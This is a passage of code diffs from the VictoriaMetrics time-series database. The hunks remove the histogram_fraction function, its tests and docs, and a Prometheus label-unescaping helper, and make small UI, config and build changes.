err := &httpserver.ErrorWithStatusCode{
|
||||
Err: fmt.Errorf("graphite tag registration has been disabled and is planned to be removed in future. " +
|
||||
"See: https://github.com/VictoriaMetrics/VictoriaMetrics/issues/10544"),
|
||||
StatusCode: http.StatusNotImplemented,
|
||||
if err := graphite.TagsTagMultiSeriesHandler(startTime, w, r); err != nil {
|
||||
graphiteTagsTagMultiSeriesErrors.Inc()
|
||||
httpserver.Errorf(w, r, "%s", err)
|
||||
return true
|
||||
}
|
||||
graphiteTagsTagMultiSeriesErrors.Inc()
|
||||
httpserver.Errorf(w, r, "%s", err)
|
||||
return true
|
||||
case "/tags":
|
||||
graphiteTagsRequests.Inc()
|
||||
|
||||
@@ -12,7 +12,6 @@ import (
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"github.com/VictoriaMetrics/metrics"
|
||||
"github.com/VictoriaMetrics/metricsql"
|
||||
@@ -529,14 +528,6 @@ func LabelValuesHandler(qt *querytracer.Tracer, startTime time.Time, labelName s
|
||||
return err
|
||||
}
|
||||
sq := storage.NewSearchQuery(cp.start, cp.end, cp.filterss, *maxLabelsAPISeries)
|
||||
|
||||
if strings.HasPrefix(labelName, "U__") {
|
||||
// This label seems to be Unicode-encoded according to the Prometheus spec.
|
||||
// See https://prometheus.io/docs/prometheus/latest/querying/api/#querying-label-values
|
||||
// Spec: https://github.com/prometheus/proposals/blob/main/proposals/0028-utf8.md
|
||||
labelName = unescapePrometheusLabelName(labelName)
|
||||
}
|
||||
|
||||
labelValues, err := netstorage.LabelValues(qt, labelName, sq, limit, cp.deadline)
|
||||
if err != nil {
|
||||
return fmt.Errorf("cannot obtain values for label %q: %w", labelName, err)
|
||||
@@ -1339,70 +1330,3 @@ func calculateMaxUniqueTimeSeriesForResource(maxConcurrentRequests, remainingMem
|
||||
func GetMaxUniqueTimeSeries() int {
|
||||
return maxUniqueTimeseriesValue
|
||||
}
|
||||
|
||||
// copied from https://github.com/prometheus/common/blob/adea6285c1c7447fcb7bfdeb6abfc6eff893e0a7/model/metric.go#L483
|
||||
// it's not possible to use direct import due to increased binary size
|
||||
func unescapePrometheusLabelName(name string) string {
|
||||
// lower function taken from strconv.atoi.
|
||||
lower := func(c byte) byte {
|
||||
return c | ('x' - 'X')
|
||||
}
|
||||
if len(name) == 0 {
|
||||
return name
|
||||
}
|
||||
escapedName, found := strings.CutPrefix(name, "U__")
|
||||
if !found {
|
||||
return name
|
||||
}
|
||||
|
||||
var unescaped strings.Builder
|
||||
TOP:
|
||||
for i := 0; i < len(escapedName); i++ {
|
||||
// All non-underscores are treated normally.
|
||||
if escapedName[i] != '_' {
|
||||
unescaped.WriteByte(escapedName[i])
|
||||
continue
|
||||
}
|
||||
i++
|
||||
if i >= len(escapedName) {
|
||||
return name
|
||||
}
|
||||
// A double underscore is a single underscore.
|
||||
if escapedName[i] == '_' {
|
||||
unescaped.WriteByte('_')
|
||||
continue
|
||||
}
|
||||
// We think we are in a UTF-8 code, process it.
|
||||
var utf8Val uint
|
||||
for j := 0; i < len(escapedName); j++ {
|
||||
// This is too many characters for a utf8 value based on the MaxRune
|
||||
// value of '\U0010FFFF'.
|
||||
if j >= 6 {
|
||||
return name
|
||||
}
|
||||
// Found a closing underscore, convert to a rune, check validity, and append.
|
||||
if escapedName[i] == '_' {
|
||||
utf8Rune := rune(utf8Val)
|
||||
if !utf8.ValidRune(utf8Rune) {
|
||||
return name
|
||||
}
|
||||
unescaped.WriteRune(utf8Rune)
|
||||
continue TOP
|
||||
}
|
||||
r := lower(escapedName[i])
|
||||
utf8Val *= 16
|
||||
switch {
|
||||
case r >= '0' && r <= '9':
|
||||
utf8Val += uint(r) - '0'
|
||||
case r >= 'a' && r <= 'f':
|
||||
utf8Val += uint(r) - 'a' + 10
|
||||
default:
|
||||
return name
|
||||
}
|
||||
i++
|
||||
}
|
||||
// Didn't find closing underscore, invalid.
|
||||
return name
|
||||
}
|
||||
return unescaped.String()
|
||||
}
|
||||
|
||||
@@ -1166,61 +1166,6 @@ func evalInstantRollup(qt *querytracer.Tracer, ec *EvalConfig, funcName string,
|
||||
},
|
||||
}
|
||||
return evalExpr(qt, ec, be)
|
||||
// the cached rate result could be inaccurate in edge cases, see https://github.com/VictoriaMetrics/VictoriaMetrics/issues/10098
|
||||
case "rate":
|
||||
if iafc != nil {
|
||||
if !strings.EqualFold(iafc.ae.Name, "sum") {
|
||||
qt.Printf("do not apply instant rollup optimization for incremental aggregate %s()", iafc.ae.Name)
|
||||
return evalAt(qt, timestamp, window)
|
||||
}
|
||||
qt.Printf("optimized calculation for sum(rate(m[d])) as (sum(increase(m[d])) / d)")
|
||||
afe := expr.(*metricsql.AggrFuncExpr)
|
||||
fe := afe.Args[0].(*metricsql.FuncExpr)
|
||||
feIncrease := *fe
|
||||
feIncrease.Name = "increase"
|
||||
// copy RollupExpr to drop possible offset,
|
||||
// see https://github.com/VictoriaMetrics/VictoriaMetrics/issues/9762
|
||||
newArg := copyRollupExpr(fe.Args[0].(*metricsql.RollupExpr))
|
||||
newArg.Offset = nil
|
||||
feIncrease.Args = []metricsql.Expr{newArg}
|
||||
d := newArg.Window.Duration(ec.Step)
|
||||
if d == 0 {
|
||||
d = ec.Step
|
||||
}
|
||||
afeIncrease := *afe
|
||||
afeIncrease.Args = []metricsql.Expr{&feIncrease}
|
||||
be := &metricsql.BinaryOpExpr{
|
||||
Op: "/",
|
||||
KeepMetricNames: true,
|
||||
Left: &afeIncrease,
|
||||
Right: &metricsql.NumberExpr{
|
||||
N: float64(d) / 1000,
|
||||
},
|
||||
}
|
||||
return evalExpr(qt, ec, be)
|
||||
}
|
||||
qt.Printf("optimized calculation for instant rollup rate(m[d]) as (increase(m[d]) / d)")
|
||||
fe := expr.(*metricsql.FuncExpr)
|
||||
feIncrease := *fe
|
||||
feIncrease.Name = "increase"
|
||||
// copy RollupExpr to drop possible offset,
|
||||
// see https://github.com/VictoriaMetrics/VictoriaMetrics/issues/9762
|
||||
newArg := copyRollupExpr(fe.Args[0].(*metricsql.RollupExpr))
|
||||
newArg.Offset = nil
|
||||
feIncrease.Args = []metricsql.Expr{newArg}
|
||||
d := newArg.Window.Duration(ec.Step)
|
||||
if d == 0 {
|
||||
d = ec.Step
|
||||
}
|
||||
be := &metricsql.BinaryOpExpr{
|
||||
Op: "/",
|
||||
KeepMetricNames: fe.KeepMetricNames,
|
||||
Left: &feIncrease,
|
||||
Right: &metricsql.NumberExpr{
|
||||
N: float64(d) / 1000,
|
||||
},
|
||||
}
|
||||
return evalExpr(qt, ec, be)
|
||||
case "max_over_time":
|
||||
if iafc != nil {
|
||||
if !strings.EqualFold(iafc.ae.Name, "max") {
|
||||
|
||||
@@ -4018,12 +4018,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(scalar)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(123, 456, time())`
|
||||
resultExpected := []netstorage.Result{}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(single-value-no-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_quantile(0.6, label_set(100, "foo", "bar"))`
|
||||
@@ -4036,12 +4030,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-no-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(123,456, label_set(100, "foo", "bar"))`
|
||||
resultExpected := []netstorage.Result{}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(single-value-invalid-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_quantile(0.6, label_set(100, "le", "foobar"))`
|
||||
@@ -4054,12 +4042,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-invalid-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(50, 60, label_set(100, "le", "foobar"))`
|
||||
resultExpected := []netstorage.Result{}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(single-value-inf-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_quantile(0.6, label_set(100, "le", "+Inf"))`
|
||||
@@ -4201,28 +4183,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-valid-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(0, 100, label_set(100, "le", "200"))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0.5, 0.5, 0.5, 0.5, 0.5, 0.5},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-valid-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(200, 300, label_set(100, "le", "200"))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0, 0, 0, 0, 0, 0},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(single-value-valid-le, boundsLabel)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `sort(histogram_quantile(0.6, label_set(100, "le", "200"), "foobar"))`
|
||||
@@ -4252,7 +4212,7 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r1, r2, r3}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_share(single-value-valid-le, boundsLabel)`, func(t *testing.T) {
|
||||
t.Run(`histogram_quantile(single-value-valid-le, boundsLabel)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `sort(histogram_share(120, label_set(100, "le", "200"), "foobar"))`
|
||||
r1 := netstorage.Result{
|
||||
@@ -4351,37 +4311,7 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-valid-le-max-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(0,100, (
|
||||
label_set(100, "le", "100"),
|
||||
label_set(40, "le", "50"),
|
||||
label_set(0, "le", "10"),
|
||||
))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{1, 1, 1, 1, 1, 1},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-valid-le-min-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(0,10, (
|
||||
label_set(100, "le", "100"),
|
||||
label_set(40, "le", "50"),
|
||||
label_set(0, "le", "10"),
|
||||
))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0, 0, 0, 0, 0, 0},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_share(single-value-valid-le-mid-le-1)`, func(t *testing.T) {
|
||||
t.Run(`histogram_share(single-value-valid-le-mid-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_share(105, (
|
||||
label_set(100, "le", "200"),
|
||||
@@ -4395,34 +4325,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_share(single-value-valid-le-mid-le-2)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_share(55, (
|
||||
label_set(100, "le", "200"),
|
||||
label_set(0, "le", "55"),
|
||||
))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0, 0, 0, 0, 0, 0},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(single-value-valid-le-mid-le)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(55,105, (
|
||||
label_set(100, "le", "200"),
|
||||
label_set(0, "le", "55"),
|
||||
))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0.3448275862068966, 0.3448275862068966, 0.3448275862068966, 0.3448275862068966, 0.3448275862068966, 0.3448275862068966},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(single-value-valid-le-min-phi-no-zero-bucket)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_quantile(0, label_set(100, "le", "200"))`
|
||||
@@ -4456,17 +4358,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(scalar-phi)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(25, time() / 8, label_set(100, "le", "200"))`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0.5, 0.625, 0.75, 0.875, 0.875, 0.875},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(duplicate-le)`, func(t *testing.T) {
|
||||
// See https://github.com/VictoriaMetrics/VictoriaMetrics/pull/3225
|
||||
t.Parallel()
|
||||
@@ -4548,36 +4439,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r1, r2}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(valid)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `sort(histogram_fraction(0, 25,
|
||||
label_set(90, "foo", "bar", "le", "10")
|
||||
or label_set(100, "foo", "bar", "le", "30")
|
||||
or label_set(300, "foo", "bar", "le", "+Inf")
|
||||
or label_set(200, "tag", "xx", "le", "10")
|
||||
or label_set(300, "tag", "xx", "le", "30")
|
||||
))`
|
||||
r1 := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0.325, 0.325, 0.325, 0.325, 0.325, 0.325},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
r1.MetricName.Tags = []storage.Tag{{
|
||||
Key: []byte("foo"),
|
||||
Value: []byte("bar"),
|
||||
}}
|
||||
r2 := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
r2.MetricName.Tags = []storage.Tag{{
|
||||
Key: []byte("tag"),
|
||||
Value: []byte("xx"),
|
||||
}}
|
||||
resultExpected := []netstorage.Result{r1, r2}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(negative-bucket-count)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_quantile(0.6,
|
||||
@@ -4694,25 +4555,6 @@ func TestExecSuccess(t *testing.T) {
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_fraction(normal-bucket-count)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `histogram_fraction(22,35,
|
||||
label_set(0, "foo", "bar", "le", "10")
|
||||
or label_set(100, "foo", "bar", "le", "30")
|
||||
or label_set(300, "foo", "bar", "le", "+Inf")
|
||||
)`
|
||||
r := netstorage.Result{
|
||||
MetricName: metricNameExpected,
|
||||
Values: []float64{0.1333333333333333, 0.1333333333333333, 0.1333333333333333, 0.1333333333333333, 0.1333333333333333, 0.1333333333333333},
|
||||
Timestamps: timestampsExpected,
|
||||
}
|
||||
r.MetricName.Tags = []storage.Tag{{
|
||||
Key: []byte("foo"),
|
||||
Value: []byte("bar"),
|
||||
}}
|
||||
resultExpected := []netstorage.Result{r}
|
||||
f(q, resultExpected)
|
||||
})
|
||||
t.Run(`histogram_quantile(normal-bucket-count, boundsLabel)`, func(t *testing.T) {
|
||||
t.Parallel()
|
||||
q := `sort(histogram_quantile(0.2,
|
||||
|
||||
@@ -51,7 +51,6 @@ var transformFuncs = map[string]transformFunc{
|
||||
"exp": newTransformFuncOneArg(transformExp),
|
||||
"floor": newTransformFuncOneArg(transformFloor),
|
||||
"histogram_avg": transformHistogramAvg,
|
||||
"histogram_fraction": transformHistogramFraction,
|
||||
"histogram_quantile": transformHistogramQuantile,
|
||||
"histogram_quantiles": transformHistogramQuantiles,
|
||||
"histogram_share": transformHistogramShare,
|
||||
@@ -663,13 +662,13 @@ func transformHistogramShare(tfa *transformFuncArg) ([]*timeseries, error) {
|
||||
if math.IsNaN(leReq) || len(xss) == 0 {
|
||||
return nan, nan, nan
|
||||
}
|
||||
fixBrokenBuckets(i, xss)
|
||||
if leReq < 0 {
|
||||
return 0, 0, 0
|
||||
}
|
||||
if math.IsInf(leReq, 1) {
|
||||
return 1, 1, 1
|
||||
}
|
||||
fixBrokenBuckets(i, xss)
|
||||
var vPrev, lePrev float64
|
||||
for _, xs := range xss {
|
||||
v := xs.ts.Values[i]
|
||||
@@ -730,85 +729,6 @@ func transformHistogramShare(tfa *transformFuncArg) ([]*timeseries, error) {
|
||||
return rvs, nil
|
||||
}
|
||||
|
||||
// histogram_fraction is a shortcut for `histogram_share(upperLe, buckets) - histogram_share(lowerLe, buckets)`;
|
||||
// histogram_fraction(x, y) = histogram_fraction(-Inf, y) - histogram_fraction(-Inf, x) = histogram_share(y) - histogram_share(x).
|
||||
// This function is supported by PromQL.
|
||||
func transformHistogramFraction(tfa *transformFuncArg) ([]*timeseries, error) {
|
||||
args := tfa.args
|
||||
if err := expectTransformArgsNum(args, 3); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
lowerles, err := getScalar(args[0], 0)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("cannot parse lower le: %w", err)
|
||||
}
|
||||
upperles, err := getScalar(args[1], 1)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("cannot parse upper le: %w", err)
|
||||
}
|
||||
if lowerles[0] >= upperles[0] {
|
||||
return nil, fmt.Errorf("lower le cannot be greater than upper le; got lower le: %f, upper le: %f", lowerles[0], upperles[0])
|
||||
}
|
||||
|
||||
// Convert buckets with `vmrange` labels to buckets with `le` labels.
|
||||
tss := vmrangeBucketsToLE(args[2])
|
||||
|
||||
// Group metrics by all tags excluding "le"
|
||||
m := groupLeTimeseries(tss)
|
||||
|
||||
fraction := func(i int, lowerle, upperle float64, xss []leTimeseries) (q float64) {
|
||||
if math.IsNaN(lowerle) || math.IsNaN(upperle) || len(xss) == 0 {
|
||||
return nan
|
||||
}
|
||||
fixBrokenBuckets(i, xss)
|
||||
share := func(leReq float64) float64 {
|
||||
if leReq < 0 {
|
||||
return 0
|
||||
}
|
||||
if math.IsInf(leReq, 1) {
|
||||
return 1
|
||||
}
|
||||
var vPrev, lePrev float64
|
||||
for _, xs := range xss {
|
||||
v := xs.ts.Values[i]
|
||||
le := xs.le
|
||||
if leReq >= le {
|
||||
vPrev = v
|
||||
lePrev = le
|
||||
continue
|
||||
}
|
||||
// precondition: lePrev <= leReq < le
|
||||
vLast := xss[len(xss)-1].ts.Values[i]
|
||||
lower := vPrev / vLast
|
||||
if math.IsInf(le, 1) {
|
||||
return lower
|
||||
}
|
||||
if lePrev == leReq {
|
||||
return lower
|
||||
}
|
||||
q = lower + (v-vPrev)/vLast*(leReq-lePrev)/(le-lePrev)
|
||||
return q
|
||||
}
|
||||
return 1
|
||||
}
|
||||
return share(upperle) - share(lowerle)
|
||||
}
|
||||
rvs := make([]*timeseries, 0, len(m))
|
||||
for _, xss := range m {
|
||||
sort.Slice(xss, func(i, j int) bool {
|
||||
return xss[i].le < xss[j].le
|
||||
})
|
||||
xss = mergeSameLE(xss)
|
||||
dst := xss[0].ts
|
||||
for i := range dst.Values {
|
||||
q := fraction(i, lowerles[i], upperles[i], xss)
|
||||
dst.Values[i] = q
|
||||
}
|
||||
rvs = append(rvs, dst)
|
||||
}
|
||||
return rvs, nil
|
||||
}
|
||||
|
||||
func transformHistogramAvg(tfa *transformFuncArg) ([]*timeseries, error) {
|
||||
args := tfa.args
|
||||
if err := expectTransformArgsNum(args, 1); err != nil {
|
||||
|
||||
@@ -1227,10 +1227,7 @@ Metric names are stripped from the resulting series. Add [keep_metric_names](#ke
|
||||
#### buckets_limit
|
||||
|
||||
`buckets_limit(limit, buckets)` is a [transform function](#transform-functions), which limits the number
|
||||
of [histogram buckets](https://valyala.medium.com/improving-histogram-usability-for-prometheus-and-grafana-bc7e5df0e350) to the given `limit`.
|
||||
|
||||
The result will preserve the first and the last bucket to improve accuracy for min and max values.
|
||||
So, if the `limit` is greater than 0 and less than 3, the function will still return 3 buckets: the first bucket, the last bucket, and a selected bucket.
|
||||
of [histogram buckets](https://valyala.medium.com/improving-histogram-usability-for-prometheus-and-grafana-bc7e5df0e350) to the given `limit`.
|
||||
|
||||
See also [prometheus_buckets](#prometheus_buckets) and [histogram_quantile](#histogram_quantile).
|
||||
|
||||
@@ -1384,15 +1381,6 @@ It can be used for calculating the average over the given time range across mult
|
||||
For example, `histogram_avg(sum(histogram_over_time(response_time_duration_seconds[5m])) by (vmrange,job))` would return the average response time
|
||||
per each `job` over the last 5 minutes.
|
||||
|
||||
#### histogram_fraction
|
||||
|
||||
`histogram_fraction(lowerLe, upperLe, buckets)` is a [transform function](#transform-functions), which calculates the share (in the range `[0...1]`) for `buckets` that fall between `lowerLe` and `upperLe`.
|
||||
The result of `histogram_fraction(lowerLe, upperLe, buckets)` is equivalent to `histogram_share(upperLe, buckets) - histogram_share(lowerLe, buckets)`.
|
||||
|
||||
This function is supported by PromQL.
|
||||
|
||||
See also [histogram_share](#histogram_share).
|
||||
|
||||
#### histogram_quantile
|
||||
|
||||
`histogram_quantile(phi, buckets)` is a [transform function](#transform-functions), which calculates `phi`-[percentile](https://en.wikipedia.org/wiki/Percentile)
|
||||
@@ -37,7 +37,7 @@
|
||||
<meta property="og:title" content="UI for VictoriaMetrics">
|
||||
<meta property="og:url" content="https://victoriametrics.com/">
|
||||
<meta property="og:description" content="Explore and troubleshoot your VictoriaMetrics data">
|
||||
<script type="module" crossorigin src="./assets/index-DIRuq0ns.js"></script>
|
||||
<script type="module" crossorigin src="./assets/index-C1hTBemk.js"></script>
|
||||
<link rel="modulepreload" crossorigin href="./assets/vendor-BR6Q0Fin.js">
|
||||
<link rel="stylesheet" crossorigin href="./assets/vendor-D1GxaB_c.css">
|
||||
<link rel="stylesheet" crossorigin href="./assets/index-D7CzMv1O.css">
|
||||
|
||||
@@ -62,7 +62,7 @@ var (
|
||||
"Excess series are logged and dropped. This can be useful for limiting series churn rate. See https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#cardinality-limiter . "+
|
||||
"See also -storage.maxHourlySeries")
|
||||
|
||||
minFreeDiskSpaceBytes = flagutil.NewBytes("storage.minFreeDiskSpaceBytes", 100e6, "The minimum free disk space at -storageDataPath after which the storage stops accepting new data")
|
||||
minFreeDiskSpaceBytes = flagutil.NewBytes("storage.minFreeDiskSpaceBytes", 10e6, "The minimum free disk space at -storageDataPath after which the storage stops accepting new data")
|
||||
|
||||
cacheSizeStorageTSID = flagutil.NewBytes("storage.cacheSizeStorageTSID", 0, "Overrides max size for storage/tsid cache. "+
|
||||
"See https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#cache-tuning")
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
FROM golang:1.26.1 AS build-web-stage
|
||||
FROM golang:1.26.0 AS build-web-stage
|
||||
COPY build /build
|
||||
|
||||
WORKDIR /build
|
||||
|
||||
@@ -1227,10 +1227,7 @@ Metric names are stripped from the resulting series. Add [keep_metric_names](#ke
|
||||
#### buckets_limit
|
||||
|
||||
`buckets_limit(limit, buckets)` is a [transform function](#transform-functions), which limits the number
|
||||
of [histogram buckets](https://valyala.medium.com/improving-histogram-usability-for-prometheus-and-grafana-bc7e5df0e350) to the given `limit`.
|
||||
|
||||
The result will preserve the first and the last bucket to improve accuracy for min and max values.
|
||||
So, if the `limit` is greater than 0 and less than 3, the function will still return 3 buckets: the first bucket, the last bucket, and a selected bucket.
|
||||
of [histogram buckets](https://valyala.medium.com/improving-histogram-usability-for-prometheus-and-grafana-bc7e5df0e350) to the given `limit`.
|
||||
|
||||
See also [prometheus_buckets](#prometheus_buckets) and [histogram_quantile](#histogram_quantile).
|
||||
|
||||
@@ -1384,15 +1381,6 @@ It can be used for calculating the average over the given time range across mult
|
||||
For example, `histogram_avg(sum(histogram_over_time(response_time_duration_seconds[5m])) by (vmrange,job))` would return the average response time
|
||||
per each `job` over the last 5 minutes.
|
||||
|
||||
#### histogram_fraction
|
||||
|
||||
`histogram_fraction(lowerLe, upperLe, buckets)` is a [transform function](#transform-functions), which calculates the share (in the range `[0...1]`) for `buckets` that fall between `lowerLe` and `upperLe`.
|
||||
The result of `histogram_fraction(lowerLe, upperLe, buckets)` is equivalent to `histogram_share(upperLe, buckets) - histogram_share(lowerLe, buckets)`.
|
||||
|
||||
This function is supported by PromQL.
|
||||
|
||||
See also [histogram_share](#histogram_share).
|
||||
|
||||
#### histogram_quantile
|
||||
|
||||
`histogram_quantile(phi, buckets)` is a [transform function](#transform-functions), which calculates `phi`-[percentile](https://en.wikipedia.org/wiki/Percentile)
|
||||
|
||||
@@ -55,7 +55,7 @@ const ExploreMetricItem: FC<ExploreMetricItemGraphProps> = ({
|
||||
|
||||
const base = `{${params.join(",")}}`;
|
||||
if (isBucket) {
|
||||
return [`sum(increase_pure(${base})) by (vmrange, le)`];
|
||||
return [`sum(rate(${base})) by (vmrange, le)`];
|
||||
}
|
||||
const queryBase = rateEnabled ? `rollup_rate(${base})` : `rollup(${base})`;
|
||||
return [`
|
||||
|
||||
@@ -27,7 +27,6 @@ interface TextFieldProps {
|
||||
endIcon?: ReactNode
|
||||
startIcon?: ReactNode
|
||||
disabled?: boolean
|
||||
readonly?: boolean
|
||||
autofocus?: boolean
|
||||
helperText?: string
|
||||
inputmode?: "search" | "text" | "email" | "tel" | "url" | "none" | "numeric" | "decimal"
|
||||
@@ -51,7 +50,6 @@ const TextField: FC<TextFieldProps> = ({
|
||||
endIcon,
|
||||
startIcon,
|
||||
disabled = false,
|
||||
readonly = false,
|
||||
autofocus = false,
|
||||
inputmode = "text",
|
||||
caretPosition,
|
||||
@@ -150,7 +148,6 @@ const TextField: FC<TextFieldProps> = ({
|
||||
<textarea
|
||||
className={inputClasses}
|
||||
disabled={disabled}
|
||||
readOnly={readonly}
|
||||
ref={textareaRef}
|
||||
value={value}
|
||||
rows={1}
|
||||
@@ -169,7 +166,6 @@ const TextField: FC<TextFieldProps> = ({
|
||||
<input
|
||||
className={inputClasses}
|
||||
disabled={disabled}
|
||||
readOnly={readonly}
|
||||
ref={inputRef}
|
||||
value={value}
|
||||
type={type}
|
||||
|
||||
@@ -115,20 +115,16 @@ const DownsamplingFilters: FC = () => {
|
||||
</div>
|
||||
<div className="vm-downsampling-filters-body-top">
|
||||
<a
|
||||
className="vm-link vm-link_with-icon"
|
||||
target="_blank"
|
||||
href="https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#downsampling"
|
||||
rel="help noreferrer"
|
||||
>
|
||||
<Button
|
||||
variant="text"
|
||||
color="gray"
|
||||
startIcon={<WikiIcon/>}
|
||||
>
|
||||
Documentation
|
||||
</Button>
|
||||
<WikiIcon/>
|
||||
Documentation
|
||||
</a>
|
||||
<Button
|
||||
variant="outlined"
|
||||
variant="text"
|
||||
onClick={handleRunExample}
|
||||
>
|
||||
Try example
|
||||
@@ -138,7 +134,7 @@ const DownsamplingFilters: FC = () => {
|
||||
onClick={handleApplyFilters}
|
||||
startIcon={<PlayIcon/>}
|
||||
>
|
||||
Preview
|
||||
Apply
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
@@ -90,33 +90,25 @@ const Relabel: FC = () => {
|
||||
</div>
|
||||
<div className="vm-relabeling-header-bottom">
|
||||
<a
|
||||
className="vm-link vm-link_with-icon"
|
||||
target="_blank"
|
||||
href="https://docs.victoriametrics.com/victoriametrics/relabeling/"
|
||||
rel="help noreferrer"
|
||||
>
|
||||
<Button
|
||||
variant="text"
|
||||
color="gray"
|
||||
startIcon={<InfoIcon/>}
|
||||
>
|
||||
Relabeling cookbook
|
||||
</Button>
|
||||
<InfoIcon/>
|
||||
Relabeling cookbook
|
||||
</a>
|
||||
<a
|
||||
className="vm-link vm-link_with-icon"
|
||||
target="_blank"
|
||||
href="https://docs.victoriametrics.com/victoriametrics/relabeling/"
|
||||
rel="help noreferrer"
|
||||
>
|
||||
<Button
|
||||
variant="text"
|
